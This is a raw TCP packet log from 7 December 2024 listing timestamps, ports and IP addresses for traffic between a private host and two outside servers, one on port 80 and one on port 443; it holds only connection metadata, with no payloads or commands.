Dec 7, 2024 12:59:57.955688953 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:58.075429916 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:58.781634092 CET	443	49824	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:58.789485931 CET	49824	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:58.789504051 CET	443	49824	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:58.790363073 CET	49824	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:58.790370941 CET	443	49824	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.049591064 CET	443	49825	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.050443888 CET	49825	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.050455093 CET	443	49825	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.050483942 CET	443	49826	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.050759077 CET	49826	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.050781012 CET	443	49826	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.051059961 CET	49825	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.051064968 CET	443	49825	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.051225901 CET	49826	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.051232100 CET	443	49826	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.171195984 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.171322107 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.171406984 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.171418905 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.171477079 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.171489954 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.172175884 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.172188044 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.172234058 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.172945976 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.172956944 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.173005104 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.173885107 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.173897028 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.173907042 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.173942089 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.173959017 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.177247047 CET	443	49827	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.177730083 CET	49827	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.177752018 CET	443	49827	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.178204060 CET	49827	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.178209066 CET	443	49827	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.239639997 CET	443	49824	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.242599964 CET	443	49824	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.242676020 CET	49824	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.242736101 CET	49824	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.242750883 CET	443	49824	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.242760897 CET	49824	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.242767096 CET	443	49824	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.245843887 CET	49830	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.245872021 CET	443	49830	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.245949030 CET	49830	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.246087074 CET	49830	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.246099949 CET	443	49830	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.291177988 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.291258097 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.291419029 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.291461945 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.363374949 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.363504887 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.363518953 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.363564014 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.367645979 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.367700100 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.367877960 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.367925882 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.375926018 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.376009941 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.376218081 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.376266956 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.384409904 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.384460926 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.384588003 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.384637117 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.392721891 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.392779112 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.392924070 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.392966032 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.401141882 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.401202917 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.401288033 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.401330948 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.409523010 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.409584045 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.409746885 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.409794092 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.417876959 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.417923927 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.418090105 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.418133020 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.426321983 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.426367044 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.426481962 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.426528931 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.434760094 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.434807062 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.434886932 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.435208082 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.437565088 CET	443	49828	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.437994957 CET	49828	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.438008070 CET	443	49828	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.438472986 CET	49828	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.438478947 CET	443	49828	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.442348003 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.442413092 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.442497015 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.442540884 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.483124018 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.483202934 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.483840942 CET	443	49825	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.484838009 CET	443	49826	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.487440109 CET	443	49825	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.487498045 CET	49825	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.487540960 CET	49825	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.487545967 CET	443	49825	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.487566948 CET	49825	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.487571001 CET	443	49825	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.487832069 CET	443	49826	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.487886906 CET	49826	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.487909079 CET	49826	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.487920046 CET	443	49826	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.487930059 CET	49826	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.487934113 CET	443	49826	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.490288019 CET	49831	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.490328074 CET	443	49831	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.490370989 CET	49832	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.490391016 CET	49831	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.490400076 CET	443	49832	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.490451097 CET	49832	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.490514994 CET	49831	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.490526915 CET	443	49831	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.490602016 CET	49832	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.490612984 CET	443	49832	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.555794001 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.555888891 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.555924892 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.555984020 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.557986021 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.558032990 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.558181047 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.558224916 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.563110113 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.563174963 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.563214064 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.563251972 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.568063974 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.568128109 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.568238020 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.568285942 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.573065996 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.573127985 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.573266983 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.573317051 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.577941895 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.577997923 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.578141928 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.578192949 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.582730055 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.582783937 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.582868099 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.582920074 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.587491035 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.587551117 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.587687969 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.587738991 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.592341900 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.592446089 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.592510939 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.592583895 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.597130060 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.597194910 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.597306013 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.597348928 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.601916075 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.601975918 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.602138996 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.602181911 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.606806040 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.606865883 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.606995106 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.607039928 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.611563921 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.611625910 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.611759901 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.611809015 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.616405010 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.616460085 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.616594076 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.616642952 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.620191097 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.620249033 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.620381117 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.620433092 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.624015093 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.624061108 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.624208927 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.624252081 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.627882004 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.627934933 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.628031969 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.628089905 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.631675959 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.631726027 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.631865025 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.631911039 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.635622978 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.635683060 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.636876106 CET	443	49827	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.636909962 CET	443	49827	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.636955976 CET	443	49827	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.636955023 CET	49827	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.636993885 CET	49827	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.637175083 CET	49827	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.637191057 CET	443	49827	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.637212038 CET	49827	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.637217045 CET	443	49827	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.640177011 CET	49833	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.640232086 CET	443	49833	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.640314102 CET	49833	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.640477896 CET	49833	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.640491962 CET	443	49833	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.747487068 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.747549057 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.747725964 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.747775078 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.748986959 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.749037027 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.749558926 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.749603987 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.749775887 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.749823093 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.752739906 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.752798080 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.752886057 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.752933979 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.755774021 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.755841017 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.755918026 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.755964994 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.758763075 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.758816004 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.758893013 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.758939981 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.761734962 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.761785030 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.761846066 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.761892080 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.764502048 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.764568090 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.764703035 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.764750004 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.767390013 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.767443895 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.767570019 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.767617941 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.770241022 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.770291090 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.770440102 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.770487070 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.773130894 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.773180962 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.773401976 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.773448944 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.775991917 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.776042938 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.776192904 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.776241064 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.778893948 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.778963089 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.779140949 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.779191017 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.781789064 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.781833887 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.781958103 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.782007933 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.784646988 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.784696102 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.784826994 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.784872055 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.787517071 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.787565947 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.787733078 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.787780046 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.790400982 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.790456057 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.790601015 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.790663004 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.793289900 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.793340921 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.793512106 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.793559074 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.796216965 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.796267033 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.796386003 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.796432972 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.799077034 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.799127102 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.799295902 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.799345016 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.801930904 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.801995993 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.802133083 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.802179098 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.804889917 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.804939985 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.805005074 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.805051088 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.807687998 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.807735920 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.807893991 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.807940006 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.810607910 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.810656071 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.810781002 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.810827017 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.813458920 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.813507080 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.813677073 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.813724041 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.816332102 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.816386938 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.816545010 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.816591978 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.819248915 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.819298983 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.819468021 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.819514036 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.822093964 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.822145939 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.822298050 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.822364092 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.824985981 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.825033903 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.825198889 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.825249910 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.828360081 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.828409910 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.828643084 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.828690052 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.830718994 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.830766916 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.830910921 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.830959082 CET	49829	80	192.168.2.7	185.215.113.16
